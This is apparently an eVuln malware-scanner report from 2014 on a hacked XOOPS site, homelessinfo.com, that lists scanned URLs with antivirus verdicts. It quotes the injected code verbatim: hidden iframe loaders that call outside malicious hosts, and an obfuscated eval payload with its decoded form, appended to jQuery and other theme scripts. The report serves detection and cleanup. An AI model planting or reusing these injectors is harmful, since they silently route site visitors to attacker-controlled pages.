Malware Scanner report for homelessinfo.com

Malicious/Suspicious/Total urls checked: 13/0/18

13 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "homelessinfo.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/8/16

8 suspicious iframes found. See details below

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=homelessinfo.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://homelessinfo.com/	HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 25 Apr 2014 19:20:11 GMT Pragma: no-cache Location: ?id=1 Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: User-Agent,Accept-Encoding Content-Length: 1428 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=46ade2ff121a92cd531d07ddd1ce5bde; path=/ X-Powered-By: PHP/4.4.9	clean
http://homelessinfo.com/?id=1	200 OK Content-Length: 29410 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports: AntiVir JS/iFrame.JI Avast JS:Iframe-UC [Trj] Ikarus Trojan.IframeRef nProtect Trojan.JS.Iframe.BQZ K7AntiVirus Riskware Emsisoft Trojan.JS.Iframe.BQZ (B) Comodo TrojWare.JS.iFrame.FJ McAfee-GW-Edition JS/Iframe.AQ DrWeb JS.IFrame.285 Kaspersky Trojan-Downloader.JS.Iframe.czd Microsoft Trojan:JS/Iframe.AQ Fortinet JS/IFrame.BBEJ!tr McAfee JS/Iframe.AQ NANO-Antivirus Trojan.Script.Iframe.uznru F-Secure Trojan.JS.Iframe.BQZ F-Prot JS/IFrame.RS.gen AVG HTML/Framer Norman Iframe.NG GData Trojan.JS.Iframe.BQZ Commtouch JS/IFrame.RS.gen Agnitum Trojan.JS.IFrame.AD ESET-NOD32 JS/Iframe.EX BitDefender Trojan.JS.Iframe.BQZ
http://homelessinfo.com/themes/maitscocorporate/js/jquery.js	200 OK Content-Length: 100362 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ var _jQuery = window.jQuery, _$ = window.$; var jQuery = window.jQuery = window.$ = function( selector, context ) { return new jQuery.fn.init( selector, context ); }; var quickExpr = /^[^<](<(.\|\s)+>)[^>]$\|^#(\w+)$/, isSimple = /^.[^:#\[\.]*$/, undefined; jQuery.fn = jQuery.prototype = { init: function( selector, context ) { selector = selector \|\| document; if ( selector.nodeType ) { this[0] = selecto ... 95917 bytes are skipped ...r/> // outerHeight and outerWidth jQuery.fn["outer" + name] = function(margin) { return this["inner" + name]() + num(this, "border" + tl + "Width") + num(this, "border" + br + "Width") + (margin ? num(this, "margin" + tl) + num(this, "margin" + br) : 0); }; });})(); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571></iframe>'); Antivirus reports: AntiVir HTML/TwitScroll.B Avast JS:Iframe-AMJ [Trj] Comodo TrojWare.JS.Iframe.FK McAfee-GW-Edition JS/IFrame.gen.j DrWeb JS.IFrame.407 Kaspersky HEUR:Trojan.Script.Generic Microsoft Exploit:HTML/IframeRef.DM Fortinet JS/Iframe.HH!tr McAfee JS/IFrame.gen.j VIPRE Exploit.HTML.Iframe.dm (v) AVG HTML/Framer Norman Iframe.WL GData JS:Iframe-AMJ Hidden iFrame found. size: 2x2 src: http://mimosofacial.com/showthread.php?sid=24571 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571>
http://homelessinfo.com/themes/maitscocorporate/js/curvycorners.src.js	200 OK Content-Length: 56082 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function browserdetect() { var agent = navigator.userAgent.toLowerCase(); this.isIE = agent.indexOf("msie") > -1; this.ieVer = this.isIE ? /msie\s(\d\.\d)/.exec(agent)[1] : 0; this.isMoz = agent.indexOf('firefox') != -1; this.isSafari = agent.indexOf('safari') != -1; this.quirksMode= this.isIE && (!document.compatMode \|\| document.compatMode.indexOf("BackCompat") > -1); this.isOp = 'opera' in window; this.isWebKit = age ... 50842 bytes are skipped ... curvyCorners.scanStyles(); }; } if (typeof curvyCornersNoAutoScan === 'undefined' \|\| curvyCornersNoAutoScan === false) { if (curvyBrowser.isOp) document.addEventListener("DOMContentLoaded", curvyCorners.init, false); else addEvent(window, 'load', curvyCorners.init, false); } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571></iframe>'); Antivirus reports: AntiVir HTML/TwitScroll.B Avast JS:Iframe-AMJ [Trj] nProtect Trojan.Iframe.BZW Emsisoft Trojan.Iframe.BZW (B) Comodo TrojWare.JS.Iframe.FK McAfee-GW-Edition JS/IFrame.gen.j Kaspersky HEUR:Trojan.Script.Generic Microsoft Exploit:HTML/IframeRef.DM MicroWorld-eScan Trojan.Iframe.BZW Fortinet JS/Iframe.HH!tr McAfee JS/IFrame.gen.j F-Secure Trojan.Iframe.BZW VIPRE Exploit.HTML.Iframe.dm (v) Norman Iframe.WL GData Trojan.Iframe.BZW BitDefender Trojan.Iframe.BZW ESET-NOD32 JS/Iframe.HH Hidden iFrame found. size: 2x2 src: http://mimosofacial.com/showthread.php?sid=24571 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571>
http://homelessinfo.com/themes/maitscocorporate/js/s3Slider.js	200 OK Content-Length: 4284 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function($){ $.fn.s3Slider = function(vars) { var element = this; var timeOut = (vars.timeOut != undefined) ? vars.timeOut : 4000; var current = null; var timeOutFn = null; var faderStat = true; var mOver = false; var items = $("#" + element[0].id + "Content ." + element[0].id + "Image"); var itemsSpan = $("#" + element[0].id + "Content ." + ... 3249 bytes are skipped ...br/> fadeElement(false); } }); }); } } } } makeSlider(); }; })(jQuery); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571></iframe>'); Antivirus reports: Kaspersky HEUR:Trojan.Script.Generic Sophos Mal/Iframe-AN Hidden iFrame found. size: 2x2 src: http://mimosofacial.com/showthread.php?sid=24571 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571>
http://homelessinfo.com/include/xoops.js	200 OK Content-Length: 7866 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1026703></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://www.lightdragoons.org/ahhs.html?j=1026703></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ ... 7365 bytes are skipped ...evType, fn); return r; } else { return false; } } xoopsOnloadEvent(xoopsExternalLinks); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://babylonproduction.com/wmci.html?i=1026703></iframe>'); Antivirus reports: Avast JS:Iframe-AMJ [Trj] Kaspersky HEUR:Trojan.Script.Generic Norman Iframe.UW GData JS:Iframe-AMJ Hidden iFrame found. size: 2x2 src: http://mimosofacial.com/showthread.php?sid=24571 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mimosofacial.com/showthread.php?sid=24571> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmi.html?j=1026703 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1026703> Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1026703 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1026703> Hidden iFrame found. size: 2x2 src: http://babylonproduction.com/wmci.html?i=1026703 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://babylonproduction.com/wmci.html?i=1026703> Hidden iFrame found. size: 2x2 src: http://www.lightdragoons.org/ahhs.html?j=1026703 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://www.lightdragoons.org/ahhs.html?j=1026703>
http://homelessinfo.com/class/textsanitizer/image/image.js	200 OK Content-Length: 2055 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) try{1-prototype;}catch(asd){x=2;}if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105, ... 184 bytes are skipped ...,101,98,38,94,105,107,102,35,103,94,101,25,49,2,1,95,91,105,99,35,96,90,21,52,22,28,93,104,98,64,90,28,50,3,-1,91,101,88,108,99,90,101,106,35,89,101,89,112,36,86,103,102,90,101,90,56,95,95,97,91,30,94,93,104,98,32,49,2,1,115,48,4,0,108,96,100,89,102,109,35,102,100,97,102,87,89,23,51,21,93,104,98,56,90,89,50,3,-1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;291-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}if(x&&f&&012===10)e(s); Decoded script: function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; Antivirus reports: Avast JS:Redirector-ZK [Trj] Ikarus Trojan.IframeRef nProtect Trojan.JS.Iframe.BYF K7AntiVirus Trojan TrendMicro-HouseCall JS_IFRAME.SMRR Emsisoft Trojan.JS.Iframe.BYF (B) Comodo TrojWare.JS.iFrame.BRR McAfee-GW-Edition Heuristic.BehavesLike.JS.Suspicious.A TrendMicro JS_IFRAME.SMRR Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Iframe.BS MicroWorld-eScan Trojan.JS.Iframe.BYF NANO-Antivirus Trojan.Script.Iframe.vjblc F-Secure Trojan.JS.Iframe.BYF F-Prot JS/IFrame.QD Norman Iframe.PG GData Trojan.JS.Iframe.BYF Commtouch JS/IFrame.QD BitDefender Trojan.JS.Iframe.BYF
http://homelessinfo.com/modules/evennews/	200 OK Content-Length: 22486 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports: AntiVir JS/iFrame.JI Avast JS:Iframe-UC [Trj] Ikarus Trojan.IframeRef nProtect Trojan.JS.Iframe.BQZ K7AntiVirus Riskware Emsisoft Trojan.JS.Iframe.BQZ (B) Comodo TrojWare.JS.iFrame.FJ McAfee-GW-Edition JS/Iframe.AQ DrWeb JS.IFrame.285 Kaspersky Trojan-Downloader.JS.Iframe.czd Microsoft Trojan:JS/Iframe.AQ Fortinet JS/IFrame.BBEJ!tr McAfee JS/Iframe.AQ NANO-Antivirus Trojan.Script.Iframe.uznru F-Secure Trojan.JS.Iframe.BQZ F-Prot JS/IFrame.RS.gen AVG HTML/Framer Norman Iframe.NG GData Trojan.JS.Iframe.BQZ Commtouch JS/IFrame.RS.gen Agnitum Trojan.JS.IFrame.AD ESET-NOD32 JS/Iframe.EX BitDefender Trojan.JS.Iframe.BQZ
http://homelessinfo.com/modules/extgallery/	200 OK Content-Length: 23235 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports: AntiVir JS/iFrame.JI Avast JS:Iframe-UC [Trj] Ikarus Trojan.IframeRef nProtect Trojan.JS.Iframe.BQZ K7AntiVirus Riskware Emsisoft Trojan.JS.Iframe.BQZ (B) Comodo TrojWare.JS.iFrame.FJ McAfee-GW-Edition JS/Iframe.AQ DrWeb JS.IFrame.285 Kaspersky Trojan-Downloader.JS.Iframe.czd Microsoft Trojan:JS/Iframe.AQ Fortinet JS/IFrame.BBEJ!tr McAfee JS/Iframe.AQ NANO-Antivirus Trojan.Script.Iframe.uznru F-Secure Trojan.JS.Iframe.BQZ F-Prot JS/IFrame.RS.gen AVG HTML/Framer Norman Iframe.NG GData Trojan.JS.Iframe.BQZ Commtouch JS/IFrame.RS.gen Agnitum Trojan.JS.IFrame.AD ESET-NOD32 JS/Iframe.EX BitDefender Trojan.JS.Iframe.BQZ
http://homelessinfo.com/modules/smartfaq/	HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 25 Apr 2014 19:20:22 GMT Pragma: no-cache Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: User-Agent,Accept-Encoding Content-Length: 1382 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=43c6cc4031e193244c461d0d84a32fc4; path=/ X-Powered-By: PHP/4.4.9	clean
http://homelessinfo.com/modules/smartfaq/request.php?phpsessid=43c6cc4031e193244c461d0d84a32fc4	200 OK Content-Length: 24433 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports: AntiVir JS/iFrame.JI Avast JS:Iframe-UC [Trj] Ikarus Trojan.IframeRef nProtect Trojan.JS.Iframe.BQZ K7AntiVirus Riskware Emsisoft Trojan.JS.Iframe.BQZ (B) Comodo TrojWare.JS.iFrame.FJ McAfee-GW-Edition JS/Iframe.AQ DrWeb JS.IFrame.285 Kaspersky Trojan-Downloader.JS.Iframe.czd Microsoft Trojan:JS/Iframe.AQ Fortinet JS/IFrame.BBEJ!tr McAfee JS/Iframe.AQ NANO-Antivirus Trojan.Script.Iframe.uznru F-Secure Trojan.JS.Iframe.BQZ F-Prot JS/IFrame.RS.gen AVG HTML/Framer Norman Iframe.NG GData Trojan.JS.Iframe.BQZ Commtouch JS/IFrame.RS.gen Agnitum Trojan.JS.IFrame.AD ESET-NOD32 JS/Iframe.EX BitDefender Trojan.JS.Iframe.BQZ
http://homelessinfo.com/modules/liaise/	200 OK Content-Length: 23334 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports: AntiVir JS/iFrame.JI Avast JS:Iframe-UC [Trj] Ikarus Trojan.IframeRef nProtect Trojan.JS.Iframe.BQZ K7AntiVirus Riskware Emsisoft Trojan.JS.Iframe.BQZ (B) Comodo TrojWare.JS.iFrame.FJ McAfee-GW-Edition JS/Iframe.AQ DrWeb JS.IFrame.285 Kaspersky Trojan-Downloader.JS.Iframe.czd Microsoft Trojan:JS/Iframe.AQ Fortinet JS/IFrame.BBEJ!tr McAfee JS/Iframe.AQ NANO-Antivirus Trojan.Script.Iframe.uznru F-Secure Trojan.JS.Iframe.BQZ F-Prot JS/IFrame.RS.gen AVG HTML/Framer Norman Iframe.NG GData Trojan.JS.Iframe.BQZ Commtouch JS/IFrame.RS.gen Agnitum Trojan.JS.IFrame.AD ESET-NOD32 JS/Iframe.EX BitDefender Trojan.JS.Iframe.BQZ
http://homelessinfo.com/banners.php?op=click&bid=5	200 OK Content-Length: 19 Content-Type: text/html	clean
http://homelessinfo.com/test404page.js	404 Not Found Content-Length: 1066 Content-Type: text/html	clean
http://homelessinfo.com/modules/content/index.php?id=1	200 OK Content-Length: 29359 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports: AntiVir JS/iFrame.JI Avast JS:Iframe-UC [Trj] Ikarus Trojan.IframeRef nProtect Trojan.JS.Iframe.BQZ K7AntiVirus Riskware Emsisoft Trojan.JS.Iframe.BQZ (B) Comodo TrojWare.JS.iFrame.FJ McAfee-GW-Edition JS/Iframe.AQ DrWeb JS.IFrame.285 Kaspersky Trojan-Downloader.JS.Iframe.czd Microsoft Trojan:JS/Iframe.AQ Fortinet JS/IFrame.BBEJ!tr McAfee JS/Iframe.AQ NANO-Antivirus Trojan.Script.Iframe.uznru F-Secure Trojan.JS.Iframe.BQZ F-Prot JS/IFrame.RS.gen AVG HTML/Framer Norman Iframe.NG GData Trojan.JS.Iframe.BQZ Commtouch JS/IFrame.RS.gen Agnitum Trojan.JS.IFrame.AD ESET-NOD32 JS/Iframe.EX BitDefender Trojan.JS.Iframe.BQZ
http://homelessinfo.com/modules/content/	HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 25 Apr 2014 19:20:27 GMT Pragma: no-cache Location: ?id=1 Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3 Vary: User-Agent,Accept-Encoding Content-Length: 1428 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=e75ca5e4d650939d92e9eff537697d9d; path=/ X-Powered-By: PHP/4.4.9	clean
http://homelessinfo.com/modules/content/?id=1	200 OK Content-Length: 29350 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports: AntiVir JS/iFrame.JI Avast JS:Iframe-UC [Trj] Ikarus Trojan.IframeRef nProtect Trojan.JS.Iframe.BQZ K7AntiVirus Riskware Emsisoft Trojan.JS.Iframe.BQZ (B) Comodo TrojWare.JS.iFrame.FJ McAfee-GW-Edition JS/Iframe.AQ DrWeb JS.IFrame.285 Kaspersky Trojan-Downloader.JS.Iframe.czd Microsoft Trojan:JS/Iframe.AQ Fortinet JS/IFrame.BBEJ!tr McAfee JS/Iframe.AQ NANO-Antivirus Trojan.Script.Iframe.uznru F-Secure Trojan.JS.Iframe.BQZ F-Prot JS/IFrame.RS.gen AVG HTML/Framer Norman Iframe.NG GData Trojan.JS.Iframe.BQZ Commtouch JS/IFrame.RS.gen Agnitum Trojan.JS.IFrame.AD ESET-NOD32 JS/Iframe.EX BitDefender Trojan.JS.Iframe.BQZ
http://homelessinfo.com/modules/content/index.php?id=4	200 OK Content-Length: 32164 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php'); _q.style.position = 'absolute'; _q.style.width = '12px'; _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1); _q.style.left = '-4327px'; document.write('<div id=\'pzeadv\'></div>'); document.getElementById('pzeadv').appendChild(_q); Antivirus reports: AntiVir JS/iFrame.JI Avast JS:Iframe-UC [Trj] Ikarus Trojan.IframeRef nProtect Trojan.JS.Iframe.BQZ K7AntiVirus Riskware Emsisoft Trojan.JS.Iframe.BQZ (B) Comodo TrojWare.JS.iFrame.FJ McAfee-GW-Edition JS/Iframe.AQ DrWeb JS.IFrame.285 Kaspersky Trojan-Downloader.JS.Iframe.czd Microsoft Trojan:JS/Iframe.AQ Fortinet JS/IFrame.BBEJ!tr McAfee JS/Iframe.AQ NANO-Antivirus Trojan.Script.Iframe.uznru F-Secure Trojan.JS.Iframe.BQZ F-Prot JS/IFrame.RS.gen AVG HTML/Framer Norman Iframe.NG GData Trojan.JS.Iframe.BQZ Commtouch JS/IFrame.RS.gen Agnitum Trojan.JS.IFrame.AD ESET-NOD32 JS/Iframe.EX BitDefender Trojan.JS.Iframe.BQZ

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: homelessinfo.com

Result:
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 25 Apr 2014 19:20:11 GMT
Pragma: no-cache
Location: ?id=1
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: User-Agent,Accept-Encoding
Content-Length: 1428
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=46ade2ff121a92cd531d07ddd1ce5bde; path=/
X-Powered-By: PHP/4.4.9

...1428 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: homelessinfo.com
Referer: http://www.google.com/search?q=homelessinfo.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for homelessinfo.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools